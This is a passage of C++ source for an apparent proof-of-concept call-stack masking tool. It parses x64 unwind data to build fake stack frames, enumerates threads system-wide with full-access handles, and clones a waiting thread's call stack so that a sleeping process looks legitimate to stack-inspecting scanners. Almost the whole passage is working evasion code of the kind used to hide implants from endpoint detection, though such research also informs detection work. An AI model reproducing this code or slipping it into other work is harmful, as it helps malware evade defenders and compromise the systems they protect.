LoadLibrary(stackFrame.targetDll.c_str()); 247 | if (!tmpImageBase) 248 | { 249 | status = STATUS_DLL_NOT_FOUND; 250 | goto Cleanup; 251 | } 252 | } 253 | 254 | // [2] If we haven't already recorded the 255 | // image base capture it now. 256 | if (!tmpImageBase) 257 | { 258 | tmpImageBase = GetModuleHandle(stackFrame.targetDll.c_str()); 259 | if (!tmpImageBase) 260 | { 261 | status = STATUS_DLL_NOT_FOUND; 262 | goto Cleanup; 263 | } 264 | } 265 | 266 | // [3] Add to image base map to avoid superfluous recalculating. 267 | imageBaseMap.insert({ stackFrame.targetDll, tmpImageBase }); 268 | 269 | Cleanup: 270 | return status; 271 | } 272 | 273 | // 274 | // Uses the offset within the StackFrame structure to 275 | // calculate the return address for fake frame. 276 | // *Modified this to use GetProcAddress + offset in function*. 277 | // 278 | NTSTATUS CalculateReturnAddress(StackFrame& stackFrame) 279 | { 280 | NTSTATUS status = STATUS_SUCCESS; 281 | 282 | try { 283 | const PVOID targetImageBaseAddress = imageBaseMap.at(stackFrame.targetDll); 284 | if (!targetImageBaseAddress) { 285 | status = STATUS_DLL_NOT_FOUND; 286 | goto Cleanup; 287 | } 288 | auto funcAddr = GetProcAddress((HMODULE)targetImageBaseAddress, stackFrame.targetFunc.c_str()); 289 | if (!funcAddr) { 290 | status = STATUS_ORDINAL_NOT_FOUND; 291 | goto Cleanup; 292 | } 293 | stackFrame.returnAddress = (PCHAR)funcAddr + stackFrame.offset; 294 | } 295 | catch (const std::out_of_range&) 296 | { 297 | std::cout << "Dll \"" << stackFrame.targetDll.c_str() << "\" not found" << std::endl; 298 | status = STATUS_DLL_NOT_FOUND; 299 | goto Cleanup; 300 | } 301 | 302 | Cleanup: 303 | return status; 304 | } 305 | 306 | // 307 | // Calculates the total stack space used by the fake stack frame. Uses 308 | // a minimal implementation of RtlVirtualUnwind to parse the unwind codes 309 | // for target function and add up total stack size. Largely based on: 310 | // https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773 311 | // 312 | NTSTATUS CalculateFunctionStackSize(PRUNTIME_FUNCTION pRuntimeFunction, const DWORD64 ImageBase, StackFrame& stackFrame) 313 | { 314 | NTSTATUS status = STATUS_SUCCESS; 315 | PUNWIND_INFO pUnwindInfo = NULL; 316 | ULONG unwindOperation = 0; 317 | ULONG operationInfo = 0; 318 | ULONG index = 0; 319 | ULONG frameOffset = 0; 320 | 321 | // [0] Sanity check incoming pointer. 322 | if (!pRuntimeFunction) 323 | { 324 | std::cout << " [-] No RUNTIME_FUNCTION found for target function.\n"; 325 | status = STATUS_INVALID_PARAMETER; 326 | goto Cleanup; 327 | } 328 | 329 | // [1] Loop over unwind info. 330 | // NB As this is a PoC, it does not handle every unwind operation, but 331 | // rather the minimum set required to successfully mimic the default 332 | // call stacks included. 333 | pUnwindInfo = (PUNWIND_INFO)(pRuntimeFunction->UnwindData + ImageBase); 334 | while (index < pUnwindInfo->CountOfCodes) 335 | { 336 | unwindOperation = pUnwindInfo->UnwindCode[index].UnwindOp; 337 | operationInfo = pUnwindInfo->UnwindCode[index].OpInfo; 338 | // [2] Loop over unwind codes and calculate 339 | // total stack space used by target function. 340 | switch (unwindOperation) { 341 | case UWOP_PUSH_NONVOL: 342 | // UWOP_PUSH_NONVOL is 8 bytes. 343 | stackFrame.totalStackSize += 8; 344 | // Record if it pushes rbp as 345 | // this is important for UWOP_SET_FPREG. 346 | if (RBP_OP_INFO == operationInfo) 347 | { 348 | stackFrame.pushRbp = true; 349 | // Record when rbp is pushed to stack. 350 | stackFrame.countOfCodes = pUnwindInfo->CountOfCodes; 351 | stackFrame.pushRbpIndex = index + 1; 352 | } 353 | break; 354 | case UWOP_SAVE_NONVOL: 355 | //UWOP_SAVE_NONVOL doesn't contribute to stack size 356 | // but you do need to increment index. 357 | index += 1; 358 | break; 359 | case UWOP_ALLOC_SMALL: 360 | //Alloc size is op info field * 8 + 8. 361 | stackFrame.totalStackSize += ((operationInfo * 8) + 8); 362 | break; 363 | case UWOP_ALLOC_LARGE: 364 | // Alloc large is either: 365 | // 1) If op info == 0 then size of alloc / 8 366 | // is in the next slot (i.e. index += 1). 367 | // 2) If op info == 1 then size is in next 368 | // two slots. 369 | index += 1; 370 | frameOffset = pUnwindInfo->UnwindCode[index].FrameOffset; 371 | if (operationInfo == 0) 372 | { 373 | frameOffset *= 8; 374 | } 375 | else 376 | { 377 | index += 1; 378 | frameOffset += (pUnwindInfo->UnwindCode[index].FrameOffset << 16); 379 | } 380 | stackFrame.totalStackSize += frameOffset; 381 | break; 382 | case UWOP_SET_FPREG: 383 | // This sets rsp == rbp (mov rsp,rbp), so we need to ensure 384 | // that rbp is the expected value (in the frame above) when 385 | // it comes to spoof this frame in order to ensure the 386 | // call stack is correctly unwound. 387 | stackFrame.setsFramePointer = true; 388 | break; 389 | default: 390 | std::cout << " [-] Error: Unsupported Unwind Op Code\n"; 391 | status = STATUS_ASSERTION_FAILURE; 392 | goto Cleanup; 393 | } 394 | 395 | index += 1; 396 | } 397 | 398 | // If chained unwind information is present then we need to 399 | // also recursively parse this and add to total stack size. 400 | if (0 != (pUnwindInfo->Flags & UNW_FLAG_CHAININFO)) 401 | { 402 | index = pUnwindInfo->CountOfCodes; 403 | if (0 != (index & 1)) 404 | { 405 | index += 1; 406 | } 407 | pRuntimeFunction = (PRUNTIME_FUNCTION)(&pUnwindInfo->UnwindCode[index]); 408 | return CalculateFunctionStackSize(pRuntimeFunction, ImageBase, stackFrame); 409 | } 410 | 411 | // Add the size of the return address (8 bytes). 412 | stackFrame.totalStackSize += 8; 413 | 414 | Cleanup: 415 | return status; 416 | } 417 | 418 | // 419 | // Retrieves the runtime function entry for given fake ret address 420 | // and calls CalculateFunctionStackSize, which will recursively 421 | // calculate the total stack space utilisation. 422 | // 423 | NTSTATUS CalculateFunctionStackSizeWrapper(StackFrame& stackFrame) 424 | { 425 | NTSTATUS status = STATUS_SUCCESS; 426 | PRUNTIME_FUNCTION pRuntimeFunction = NULL; 427 | DWORD64 ImageBase = 0; 428 | PUNWIND_HISTORY_TABLE pHistoryTable = NULL; 429 | 430 | // [0] Sanity check return address. 431 | if (!stackFrame.returnAddress) 432 | { 433 | status = STATUS_INVALID_PARAMETER; 434 | goto Cleanup; 435 | } 436 | 437 | // [1] Locate RUNTIME_FUNCTION for given function. 438 | pRuntimeFunction = RtlLookupFunctionEntry( 439 | (DWORD64)stackFrame.returnAddress, 440 | &ImageBase, 441 | pHistoryTable); 442 | if (NULL == pRuntimeFunction) 443 | { 444 | status = STATUS_ASSERTION_FAILURE; 445 | goto Cleanup; 446 | } 447 | 448 | // [2] Recursively calculate the total stack size for 449 | // the function we are "returning" to. 450 | status = CalculateFunctionStackSize(pRuntimeFunction, ImageBase, stackFrame); 451 | 452 | Cleanup: 453 | return status; 454 | } 455 | 456 | // 457 | // Takes a target call stack and configures it ready for use 458 | // via loading any required dlls, resolving module addresses, 459 | // and calculating spoofed return addresses. 460 | // 461 | NTSTATUS InitialiseSpoofedCallstack(std::vector& targetCallStack) 462 | { 463 | NTSTATUS status = STATUS_SUCCESS; 464 | 465 | for (auto stackFrame = targetCallStack.begin(); stackFrame != targetCallStack.end(); stackFrame++) 466 | { 467 | // [1] Get image base for current stack frame. 468 | status = GetImageBase(*stackFrame); 469 | if (!NT_SUCCESS(status)) 470 | { 471 | std::cout << "[-] Error: Failed to get image base\n"; 472 | goto Cleanup; 473 | } 474 | 475 | // [2] Calculate ret address for current stack frame. 476 | status = CalculateReturnAddress(*stackFrame); 477 | if (!NT_SUCCESS(status)) 478 | { 479 | std::cout << "[-] Error: Failed to calculate ret address\n"; 480 | goto Cleanup; 481 | } 482 | 483 | // [3] Calculate the total stack size for ret function. 484 | status = CalculateFunctionStackSizeWrapper(*stackFrame); 485 | if (!NT_SUCCESS(status)) 486 | { 487 | std::cout << "[-] Error: Failed to caluclate total stack size\n"; 488 | goto Cleanup; 489 | } 490 | } 491 | 492 | Cleanup: 493 | return status; 494 | } 495 | 496 | // 497 | // Templated wrappers around ReadProcessMemory. 498 | // 499 | template 500 | T readProcessMemory(HANDLE hProcess, LPVOID targetAddress) 501 | { 502 | T returnValue; 503 | (void)ReadProcessMemory(hProcess, targetAddress, &returnValue, sizeof(T), NULL); 504 | return returnValue; 505 | }; 506 | 507 | // 508 | // Takes an address and retrieves the base name of the specified module. 509 | // 510 | NTSTATUS GetModuleBaseNameWrapper(HANDLE hProcess, PVOID targetAddress, std::string& moduleName) 511 | { 512 | NTSTATUS status = STATUS_SUCCESS; 513 | char szModuleBaseName[MAX_PATH]; 514 | 515 | if (GetModuleBaseNameA(hProcess, (HMODULE)targetAddress, szModuleBaseName, sizeof(szModuleBaseName))) 516 | { 517 | moduleName = szModuleBaseName; 518 | } 519 | else 520 | { 521 | printf(" [-] GetModuleBaseName returned error : %d\n", GetLastError()); 522 | status = STATUS_ASSERTION_FAILURE; 523 | } 524 | 525 | return status; 526 | } 527 | 528 | /* 529 | CallStackMasker utility functions. 530 | */ 531 | 532 | NTSTATUS HandleArgs(int argc, char* argv[], BOOL& bStaticCallStack) 533 | { 534 | NTSTATUS status = STATUS_SUCCESS; 535 | 536 | if (argc < 2) 537 | { 538 | goto Cleanup; 539 | } 540 | else 541 | { 542 | std::string callstackArg(argv[1]); 543 | if (callstackArg == "--dynamic") 544 | { 545 | bStaticCallStack = false; 546 | } 547 | else 548 | { 549 | std::cout << "[-] Error: Incorrect argument provided. The options are: --dynamic\n"; 550 | status = ERROR_INVALID_PARAMETER; 551 | } 552 | } 553 | 554 | Cleanup: 555 | return status; 556 | } 557 | 558 | // 559 | // Retrieve Child-SP for caller. 560 | // 561 | __declspec(noinline) void* GetChildSP() 562 | { 563 | // Add 8 to get correct Child-SP for frame. 564 | return (PCHAR)_AddressOfReturnAddress() + 8; 565 | } 566 | 567 | /* 568 | Static call stack masking functions. 569 | */ 570 | 571 | // 572 | // Calculates total stack space for a given static call stack. 573 | // 574 | ULONG CalculateStaticStackSize(const std::vector& targetCallStack) 575 | { 576 | ULONG totalStackCount = 0x0; 577 | for (auto entry : targetCallStack) 578 | { 579 | totalStackCount += entry.totalStackSize; 580 | } 581 | // Add 0x8 so we can write 0x0 as last 582 | // address and stop stack unwinding. 583 | totalStackCount += 0x8; 584 | return totalStackCount; 585 | } 586 | 587 | // 588 | // Creates a buffer containing a fake call stack layout. 589 | // 590 | NTSTATUS CreateFakeStackInBuffer(const std::vector& targetCallStack, const PVOID pSpoofedStack) 591 | { 592 | NTSTATUS status = STATUS_SUCCESS; 593 | int64_t* index = NULL; 594 | 595 | // [0] Sanity check incoming ptr. 596 | if (NULL == pSpoofedStack) 597 | { 598 | status = STATUS_INVALID_PARAMETER; 599 | goto Cleanup; 600 | } 601 | 602 | // [1] Loop over buffer and create desired stack layout. 603 | // NB This should be sanity checked for overflows but ignored for PoC. 604 | index = (int64_t*)pSpoofedStack; 605 | for (auto entry : targetCallStack) 606 | { 607 | // Write ret address. 608 | *index = (int64_t)entry.returnAddress; 609 | // Increment index to next Child-SP + 0x8; 610 | auto offset = entry.totalStackSize / sizeof(int64_t); 611 | index += offset; 612 | } 613 | 614 | // [2] Stop stack unwinding by writing 0x0 at end of buffer. 615 | *index = 0x0; 616 | 617 | Cleanup: 618 | return status; 619 | } 620 | 621 | // 622 | // Creates a fake stack layout in memory based on a given *static* call stack. 623 | // 624 | NTSTATUS InitialiseStaticCallStackSpoofing(std::vector& targetCallStack, threadToSpoof& thread) 625 | { 626 | NTSTATUS status = STATUS_SUCCESS; 627 | HANDLE hHeap = NULL; 628 | 629 | // [1] Initialise the target call stack. 630 | if (!NT_SUCCESS(InitialiseSpoofedCallstack(targetCallStack))) 631 | { 632 | status = STATUS_UNSUCCESSFUL; 633 | goto Cleanup; 634 | } 635 | 636 | // [2] Calculate total stack space required for fake call stack. 637 | thread.totalRequiredStackSize = CalculateStaticStackSize(targetCallStack); 638 | 639 | // [3] Allocate heap memory for required stack size. 640 | // NB this is currently never freed but it is irrelevant as PoC runs on while true loop. 641 | hHeap = GetProcessHeap(); 642 | if (!hHeap) 643 | { 644 | status = STATUS_UNSUCCESSFUL; 645 | goto Cleanup; 646 | } 647 | thread.pFakeStackBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, thread.totalRequiredStackSize); 648 | if (!thread.pFakeStackBuffer) 649 | { 650 | status = STATUS_UNSUCCESSFUL; 651 | goto Cleanup; 652 | } 653 | 654 | // [4] Create fake stack. 655 | if (!NT_SUCCESS(CreateFakeStackInBuffer(targetCallStack, thread.pFakeStackBuffer))) 656 | { 657 | status = STATUS_UNSUCCESSFUL; 658 | goto Cleanup; 659 | } 660 | //std::cout << "[+] Fake stack is at: 0x" << std::hex << thread.pFakeStackBuffer << "\n"; 661 | 662 | Cleanup: 663 | return status; 664 | } 665 | 666 | /* 667 | Dynamic call stack masking functions. 668 | */ 669 | 670 | // 671 | // Retrieve a thread's starting address. 672 | // 673 | NTSTATUS GetThreadStartAddress(const HANDLE hThread, PVOID& startAddress) 674 | { 675 | NTSTATUS status = STATUS_SUCCESS; 676 | 677 | pNtQueryInformationThread NtQueryInformationThread = (pNtQueryInformationThread)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryInformationThread"); 678 | if (!NtQueryInformationThread) 679 | { 680 | status = STATUS_UNSUCCESSFUL; 681 | goto Cleanup; 682 | } 683 | 684 | if (!NT_SUCCESS(NtQueryInformationThread(hThread, ThreadQuerySetWin32StartAddress, &startAddress, sizeof(startAddress), NULL))) 685 | { 686 | status = STATUS_UNSUCCESSFUL; 687 | goto Cleanup; 688 | } 689 | 690 | Cleanup: 691 | return status; 692 | } 693 | 694 | // 695 | // Checks if a ret address found on a stack is located within a specified function. 696 | // 697 | BOOL CheckIfAddressIsWithinTargetFunc(const PVOID targetAddress, const std::string targetModule, const std::string targetFunction) 698 | { 699 | BOOL bAddressIsWithinTargetFunc = FALSE; 700 | 701 | HMODULE hModule = NULL; 702 | PVOID pTargetFunction = NULL; 703 | PRUNTIME_FUNCTION pRuntimeFunction = NULL; 704 | PUNWIND_HISTORY_TABLE pHistoryTable = NULL; 705 | DWORD64 ImageBase = 0; 706 | void* targetFunctionStart = NULL; 707 | void* targetFunctionEnd = NULL; 708 | 709 | // [1] Resolve target function. 710 | hModule = GetModuleHandleA(targetModule.c_str()); 711 | if (!hModule) 712 | { 713 | goto Cleanup; 714 | } 715 | pTargetFunction = GetProcAddress(hModule, targetFunction.c_str()); 716 | if (!pTargetFunction) 717 | { 718 | goto Cleanup; 719 | } 720 | 721 | // [2] Find function limits. 722 | pRuntimeFunction = RtlLookupFunctionEntry( 723 | (DWORD64)pTargetFunction, 724 | &ImageBase, 725 | pHistoryTable); 726 | if (!pRuntimeFunction) 727 | { 728 | goto Cleanup; 729 | } 730 | 731 | // [3] Check if given pointer is within range. 732 | targetFunctionStart = (PCHAR)hModule + pRuntimeFunction->BeginAddress; 733 | targetFunctionEnd = (PCHAR)hModule + pRuntimeFunction->EndAddress; 734 | if ((targetAddress > targetFunctionStart) && (targetAddress < targetFunctionEnd)) 735 | { 736 | bAddressIsWithinTargetFunc = TRUE; 737 | } 738 | 739 | Cleanup: 740 | return bAddressIsWithinTargetFunc; 741 | } 742 | 743 | // 744 | // Takes an address in a remote process and re-maps it to the local process. 745 | // 746 | NTSTATUS NormalizeAddress(const HANDLE hProcess, const PVOID remoteAddress, PVOID& localAddress, const BOOL bIgnoreExe, const imageMap& imageBaseMap = imageMap()) 747 | { 748 | NTSTATUS status = STATUS_SUCCESS; 749 | 750 | MEMORY_BASIC_INFORMATION mbi = { 0 }; 751 | std::string moduleName; 752 | HMODULE hModule = NULL; 753 | ULONG64 offset = 0; 754 | 755 | // [1] Query pages at target address. 756 | if (!VirtualQueryEx(hProcess, (PVOID)remoteAddress, &mbi, sizeof(mbi))) 757 | { 758 | std::cout << " [-] VirtualQueryEx failed\n"; 759 | status = STATUS_UNSUCCESSFUL; 760 | goto Cleanup; 761 | } 762 | // Calculate offset of return address. 763 | offset = (PCHAR)remoteAddress - (PCHAR)mbi.AllocationBase; 764 | 765 | // [2] Try and resolve module at address. 766 | if (!NT_SUCCESS(GetModuleBaseNameWrapper(hProcess, mbi.AllocationBase, moduleName))) 767 | { 768 | status = STATUS_UNSUCCESSFUL; 769 | goto Cleanup; 770 | } 771 | std::cout << " [+] Module at ret address is: " << moduleName << "\n"; 772 | 773 | // [3] Some matching call stacks will have .exe's in them (e.g. taskhostw.exe). 774 | // This could look weird in a different process so ignore them here. 775 | if (bIgnoreExe) 776 | { 777 | if ((moduleName.find(".exe") != std::string::npos) || (moduleName.find(".EXE") != std::string::npos)) 778 | { 779 | std::cout << " [!] Found executable in call stack so rejecting: " << moduleName << "\n"; 780 | status = STATUS_UNSUCCESSFUL; 781 | goto Cleanup; 782 | } 783 | } 784 | 785 | // [4] If we can't get a handle, load Dll. 786 | hModule = GetModuleHandleA(moduleName.c_str()); 787 | if (NULL == hModule) 788 | { 789 | std::cout << " [+] Loading Library: " << moduleName.c_str() << "\n"; 790 | // NB This uses standard search strategy as opposed to full path 791 | // so may fail and could be more robust (say by using GetMappedFileName) 792 | // e.g. clr.dll most obvious example of this. 793 | hModule = LoadLibraryA(moduleName.c_str()); 794 | if (NULL == hModule) 795 | { 796 | std::cout << " [-] Failed to load dll: " << moduleName << "\n"; 797 | status = STATUS_UNSUCCESSFUL; 798 | goto Cleanup; 799 | } 800 | // Add to map so that if we fail later on in the stack unwinding 801 | // process we can unload any dlls no longer needed. 802 | (const_cast(imageBaseMap)).insert({ moduleName, hModule }); 803 | } 804 | localAddress = (PCHAR)hModule + offset; 805 | 806 | Cleanup: 807 | return status; 808 | } 809 | 810 | // 811 | // Walks the call stack of the target thread and calculates its total size. 812 | // 813 | NTSTATUS CalculateDynamicStackSize(const HANDLE hProcess, const CONTEXT ctx, ULONG& totalStackSize) 814 | { 815 | NTSTATUS status = STATUS_UNSUCCESSFUL; 816 | 817 | PVOID returnAddress = NULL; 818 | PVOID previousReturnAddress = NULL; 819 | PVOID currentChildSP = NULL; 820 | PVOID stackIndex = NULL; 821 | BOOL bHandledFirstFrame = FALSE; 822 | BOOL bFinishedUnwinding = FALSE; 823 | imageMap imageBaseMap = {}; 824 | 825 | currentChildSP = (PVOID)ctx.Rsp; 826 | stackIndex = (PVOID)ctx.Rsp; 827 | std::cout << " [+] Child-SP: 0x" << std::hex << currentChildSP << "\n"; 828 | 829 | // [1] Start unwinding the target thread stack. 830 | while (!bFinishedUnwinding) 831 | { 832 | // NB This is a *very* lightweight/hackerman method of unwinding a stack which 833 | // makes an assumption about the state of the target thread (i.e. it is waiting). 834 | if (!bHandledFirstFrame) 835 | { 836 | // We need to handle the first frame, which we assume 837 | // will be an ntdll wait function. 838 | returnAddress = (PVOID)ctx.Rip; 839 | bHandledFirstFrame = TRUE; 840 | } 841 | else 842 | { 843 | // [2] Retrieve the ret address at current stack index. 844 | previousReturnAddress = returnAddress; 845 | returnAddress = readProcessMemory(hProcess, (LPVOID)stackIndex); 846 | std::cout << " [+] RetAddr: 0x" << std::hex << returnAddress << "\n"; 847 | std::cout << " [+] Child-SP: " << std::hex << currentChildSP << "\n"; 848 | } 849 | 850 | // [3] Windows unwinds until it finds ret address of 0x0 851 | // so if this is true we have finished unwinding the stack. 852 | if (returnAddress == 0x0) 853 | { 854 | // For unknown reasons (exception handlers?) the basic stack unwinding functionality 855 | // in this PoC seems to have problems handling dbg related functionality 856 | // (e.g. DbgX.Shell.exe / corecrl.dll / Enghost.exe / dbgeng.dll..). 857 | // Therefore, as a sanity check, make sure the last address is ntdll!RtlUserThreadStart 858 | // before reporting success. 859 | if (!CheckIfAddressIsWithinTargetFunc(previousReturnAddress, "ntdll", "RtlUserThreadStart")) 860 | { 861 | std::cout << " [-] Failed to unwind stack properly\n"; 862 | goto Cleanup; 863 | } 864 | // NB If you comment out the status below you can enumerate all the thread stacks in the desired state. 865 | status = STATUS_SUCCESS; 866 | bFinishedUnwinding = TRUE; 867 | } 868 | else 869 | { 870 | StackFrame targetFrame = {}; 871 | PRUNTIME_FUNCTION pRuntimeFunction = NULL; 872 | PUNWIND_HISTORY_TABLE pHistoryTable = NULL; 873 | DWORD64 ImageBase = 0; 874 | ULONG functionStackSize = 0; 875 | 876 | // [4] Normalize address so it is valid in context of local process. 877 | if (!NT_SUCCESS(NormalizeAddress(hProcess, returnAddress, targetFrame.returnAddress, TRUE, imageBaseMap))) 878 | { 879 | std::cout << " [-] Failed to normalize remote address\n"; 880 | goto Cleanup; 881 | } 882 | 883 | // [5] Calculate function size. 884 | pRuntimeFunction = RtlLookupFunctionEntry( 885 | (DWORD64)targetFrame.returnAddress, 886 | &ImageBase, 887 | pHistoryTable); 888 | if (!NT_SUCCESS(CalculateFunctionStackSize(pRuntimeFunction, ImageBase, targetFrame))) 889 | { 890 | std::cout << " [-] Failed to calculate function stack size\n"; 891 | goto Cleanup; 892 | } 893 | 894 | // [6] Increment total stack size count and record function stack size count. 895 | totalStackSize += targetFrame.totalStackSize; 896 | functionStackSize = targetFrame.totalStackSize; 897 | 898 | // [7] Find next Child-SP. 899 | currentChildSP = (PCHAR)currentChildSP + functionStackSize; 900 | 901 | // [8] Find next return address. 902 | // Child-SP is value of rsp after stack prologue hence ret 903 | // address is pushed on immediately after. 904 | stackIndex = (PCHAR)currentChildSP - 0x8; 905 | } 906 | } 907 | 908 | Cleanup: 909 | if (!NT_SUCCESS(status)) 910 | { 911 | // If we failed for w/e reason, unload all the libraries we loaded. 912 | for (auto const& lib : imageBaseMap) 913 | { 914 | (void)FreeLibrary(lib.second); 915 | } 916 | } 917 | return status; 918 | } 919 | 920 | // 921 | // Checks target thread to see if it is waiting in our desired wait method (e.g. UserRequest + WaitForSingleObjectEx). 922 | // 923 | BOOL IsThreadAMatch(const HANDLE hProcess, const DWORD pid, const DWORD tid, threadToSpoof& thread) 924 | { 925 | BOOL bMatch = FALSE; 926 | 927 | HANDLE hThread = INVALID_HANDLE_VALUE; 928 | HANDLE hHeap = INVALID_HANDLE_VALUE; 929 | BOOL bIsWow64 = false; 930 | CONTEXT ctx = { 0 }; 931 | 932 | PVOID returnAddress = NULL; 933 | PVOID remoteStartAddress = NULL; 934 | ULONG totalStackSize = 0; 935 | 936 | // [1] Open handle to thread. 937 | hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, tid); 938 | if (!hThread) 939 | { 940 | std::cout << "[-] Failed to open a handle to thread: " << tid << "\n"; 941 | goto Cleanup; 942 | } 943 | 944 | // [2] Get thread context. 945 | std::cout << "[+] Scanning tid: " << std::dec << tid << "\n"; 946 | ctx.ContextFlags = CONTEXT_FULL; 947 | if (!GetThreadContext(hThread, &ctx)) 948 | { 949 | std::cout << "[-] Failed to get thread context for: " << tid << "\n"; 950 | goto Cleanup; 951 | } 952 | 953 | // [3] Retrieve the last return address on the stack and check if it is 954 | // our target function to spoof. 955 | returnAddress = readProcessMemory(hProcess, (LPVOID)ctx.Rsp); 956 | if (!CheckIfAddressIsWithinTargetFunc(returnAddress, targetWaitModule, targetWaitFunction)) 957 | { 958 | goto Cleanup; 959 | } 960 | 961 | // [4] Now try and confirm we can unwind the stack and calculate total required stack size. 962 | if (!NT_SUCCESS(CalculateDynamicStackSize(hProcess, ctx, totalStackSize))) 963 | { 964 | goto Cleanup; 965 | } 966 | 967 | // [5] Lastly, we need to retrieve the threads starting address in order to spoof it. 968 | if (!NT_SUCCESS(GetThreadStartAddress(hThread, remoteStartAddress))) 969 | { 970 | std::cout << "[-] Error retrieving thread start address\n"; 971 | goto Cleanup; 972 | } 973 | 974 | // [6] The start address is specific to context of remote process, so ensure the 975 | // offset is correct for wherever the dll is loaded in our memory space. 976 | if (!NT_SUCCESS(NormalizeAddress(hProcess, remoteStartAddress, thread.startAddr, FALSE))) 977 | { 978 | std::cout << "[-] Error re-calculating thread start address\n"; 979 | goto Cleanup; 980 | } 981 | 982 | // [7] At this stage, the thread stack is a match so make a copy. 983 | // To simplify this PoC (and to avoid any TOCTOU style issues) copy the stack 984 | // now and use the same buffer repeatedly. NB this is currently never freed, 985 | // but it is irrelevant as PoC runs on while true loop. 986 | hHeap = GetProcessHeap(); 987 | thread.pFakeStackBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, totalStackSize); 988 | if (!ReadProcessMemory(hProcess, (LPCVOID)ctx.Rsp, thread.pFakeStackBuffer, totalStackSize, NULL)) 989 | { 990 | HeapFree(hHeap, NULL, thread.pFakeStackBuffer); 991 | thread.pFakeStackBuffer = NULL; 992 | goto Cleanup; 993 | } 994 | 995 | thread.dwPid = pid; 996 | thread.dwTid = tid; 997 | thread.totalRequiredStackSize = totalStackSize; 998 | 999 | bMatch = TRUE; 1000 | 1001 | Cleanup: 1002 | CloseHandle(hThread); 1003 | return bMatch; 1004 | } 1005 | 1006 | // 1007 | // Enumerates threads across the system, locates one in a desired wait state, and copies its call stack. 1008 | // 1009 | // Based on: https://github.com/thefLink/Hunt-Sleeping-Beacons/blob/main/source/Hunt-Sleeping-Beacons.c 1010 | NTSTATUS InitialiseDynamicCallStackSpoofing(const ULONG waitReason, threadToSpoof& thread) 1011 | { 1012 | NTSTATUS status = STATUS_UNSUCCESSFUL; 1013 | 1014 | ULONG uBufferSize = 0; 1015 | PVOID pBuffer = NULL; 1016 | pNtQuerySystemInformation myNtQuerySystemInformation = NULL; 1017 | SYSTEM_PROCESS_INFORMATION* pSystemProcessInformation = NULL; 1018 | SYSTEM_THREAD_INFORMATION systemThreadInformation = { 0 }; 1019 | 1020 | // [1] Enumerate threads system wide and locate a thread with desired WaitReason. 1021 | myNtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation"); 1022 | if (!myNtQuerySystemInformation) 1023 | { 1024 | status = STATUS_UNSUCCESSFUL; 1025 | goto Cleanup; 1026 | } 1027 | status = myNtQuerySystemInformation(SystemProcessInformation, pBuffer, uBufferSize, &uBufferSize); 1028 | if (STATUS_INFO_LENGTH_MISMATCH != status) 1029 | { 1030 | status = STATUS_UNSUCCESSFUL; 1031 | goto Cleanup; 1032 | } 1033 | pBuffer = LocalAlloc(LMEM_FIXED, uBufferSize); 1034 | if (!pBuffer) 1035 | { 1036 | status = STATUS_UNSUCCESSFUL; 1037 | goto Cleanup; 1038 | } 1039 | if (!NT_SUCCESS(myNtQuerySystemInformation(SystemProcessInformation, pBuffer, uBufferSize, &uBufferSize))) 1040 | { 1041 | status = STATUS_UNSUCCESSFUL; 1042 | goto Cleanup; 1043 | } 1044 | pSystemProcessInformation = (SYSTEM_PROCESS_INFORMATION*)pBuffer; 1045 | 1046 | // [2] Loop over threads and attempt to find one where the last address on the 1047 | // stack is located within out target waiting function (e.g. WaitForSingleObjectEx). 1048 | while (pSystemProcessInformation && pSystemProcessInformation->NextEntryOffset) 1049 | { 1050 | BOOL bEnumThreads = true; 1051 | HANDLE hProcess = INVALID_HANDLE_VALUE; 1052 | BOOL bIsWow64 = false; 1053 | 1054 | if (NULL != pSystemProcessInformation->ImageName.Buffer) 1055 | { 1056 | std::wcout << "[+] Searching process: " << pSystemProcessInformation->ImageName.Buffer << " (" << pSystemProcessInformation->ProcessId << ")" << "\n"; 1057 | } 1058 | 1059 | // [3] Attempt to open a handle to target process. 1060 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pSystemProcessInformation->ProcessId); 1061 | if (!hProcess) 1062 | { 1063 | std::cout << "[-] Failed to open a handle to process: " << pSystemProcessInformation->ProcessId << "\n"; 1064 | bEnumThreads = false; 1065 | } 1066 | 1067 | // [4] Ignore WOW64. 1068 | if (bEnumThreads && IsWow64Process(hProcess, &bIsWow64)) 1069 | { 1070 | if (bIsWow64) 1071 | { 1072 | std::cout << "[-] Ignoring WOW64\n"; 1073 | bEnumThreads = false; 1074 | } 1075 | } 1076 | 1077 | // [5] Enumerate threads. 1078 | if (bEnumThreads) 1079 | { 1080 | for (ULONG i = 0; i < pSystemProcessInformation->NumberOfThreads; i++) 1081 | { 1082 | systemThreadInformation = pSystemProcessInformation->ThreadInfos[i]; 1083 | 1084 | // Ignore any threads not in our desired wait state. 1085 | if (waitReason != systemThreadInformation.WaitReason) 1086 | { 1087 | continue; 1088 | } 1089 | 1090 | // [6] Attempt to unwind the stack and check if stack is in our desired wait state. 1091 | if (IsThreadAMatch(hProcess, pSystemProcessInformation->ProcessId, (DWORD)systemThreadInformation.ClientId.UniqueThread, thread)) 1092 | { 1093 | // We have found a thread to clone! 1094 | std::cout << " [+] Successfully located a thread call stack to clone!" << "\n"; 1095 | std::wcout << " [+] Cloning call stack from process: " << pSystemProcessInformation->ImageName.Buffer << "\n"; 1096 | std::cout << " [+] Cloning call stack from pid: " << std::dec << pSystemProcessInformation->ProcessId << "\n"; 1097 | std::cout << " [+] Cloning call stack from tid: " << std::dec << (DWORD)systemThreadInformation.ClientId.UniqueThread << "\n"; 1098 | std::cout << " [+] Target thread start address is: 0x" << std::hex << thread.startAddr << "\n"; 1099 | std::cout << " [+] Total stack size required: 0x" << thread.totalRequiredStackSize << "\n"; 1100 | status = STATUS_SUCCESS; 1101 | CloseHandle(hProcess); 1102 | goto Cleanup; 1103 | } 1104 | } 1105 | } 1106 | // Avoid leaking handles. 1107 | if (hProcess) 1108 | { 1109 | CloseHandle(hProcess); 1110 | } 1111 | pSystemProcessInformation = (SYSTEM_PROCESS_INFORMATION*)((LPBYTE)pSystemProcessInformation + pSystemProcessInformation->NextEntryOffset); 1112 | } 1113 | 1114 | // [7] If we reached here we did not find a suitable thread call stack to spoof. 1115 | std::cout << "[!] Could not find a suitable callstack to clone.\n"; 